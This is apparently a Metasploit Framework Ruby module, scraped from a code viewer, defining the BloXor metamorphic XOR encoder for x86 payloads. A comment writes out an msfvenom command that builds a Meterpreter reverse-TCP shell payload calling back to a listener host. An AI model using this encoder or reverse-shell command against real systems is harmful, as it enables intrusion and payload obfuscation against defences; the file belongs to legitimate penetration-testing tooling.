54 lines
2.0 KiB
Ruby
54 lines
2.0 KiB
Ruby
##
|
|
# This file is part of the Metasploit Framework and may be subject to
|
|
# redistribution and commercial restrictions. Please see the Metasploit
|
|
# Framework web site for more information on licensing and terms of use.
|
|
# http://metasploit.com/framework/
|
|
##
|
|
|
|
require 'msf/core'
|
|
require 'rex/encoder/bloxor/bloxor'
|
|
|
|
#
|
|
# BloXor is a cross architecture metamorphic block based xor encoder/decoder for Metasploit.
|
|
# BloXor was inspired by the Shikata Ga Nai encoder (./msf/modules/encoders/x86/shikata_ga_nai.rb)
|
|
# by spoonm and the Rex::Poly::Block (./msf/lib/rex/poly/block.rb) code by skape.
|
|
#
|
|
# Please refer to ./msf/lib/rex/encoder/bloxor/bloxor.rb for BloXor's implementation and to
|
|
# ./msf/lib/rex/poly/machine/machine.rb and ./msf/lib/rex/poly/machine/x86.rb for the
|
|
# backend metamorphic stuff.
|
|
#
|
|
# A presentation at AthCon 2012 by Dimitrios A. Glynos called 'Packing Heat!' discusses a
|
|
# metamorphic packer for PE executables and also uses METASM. I am unaware of any code having
|
|
# been publicly released for this, so am unable to compare implementations.
|
|
# http://census-labs.com/media/packing-heat.pdf
|
|
#
|
|
# Manually check the output with the following command:
|
|
# >ruby msfvenom -p windows/meterpreter/reverse_tcp RHOST=192.168.2.2 LHOST=192.168.2.1 LPORT=80 -a x86 -e x86/bloxor -b '\x00' -f raw | ndisasm -b32 -k 128,1 -
|
|
#
|
|
|
|
class Metasploit3 < Rex::Encoder::BloXor
|
|
|
|
# Note: Currently set to manual, bump it up to automatically get selected by the framework.
|
|
# Note: BloXor by design is slow due to its exhaustive search for a solution.
|
|
Rank = ManualRanking
|
|
|
|
def initialize
|
|
super(
|
|
'Name' => 'BloXor - A Metamorphic Block Based XOR Encoder',
|
|
'Description' => 'A Metamorphic Block Based XOR Encoder.',
|
|
'Author' => [ 'sf' ],
|
|
'Arch' => ARCH_X86,
|
|
'License' => MSF_LICENSE,
|
|
'EncoderType' => Msf::Encoder::Type::Unspecified
|
|
)
|
|
end
|
|
|
|
def compute_decoder( state )
|
|
|
|
@machine = Rex::Poly::MachineX86.new( state.badchars )
|
|
|
|
super( state )
|
|
end
|
|
|
|
end
|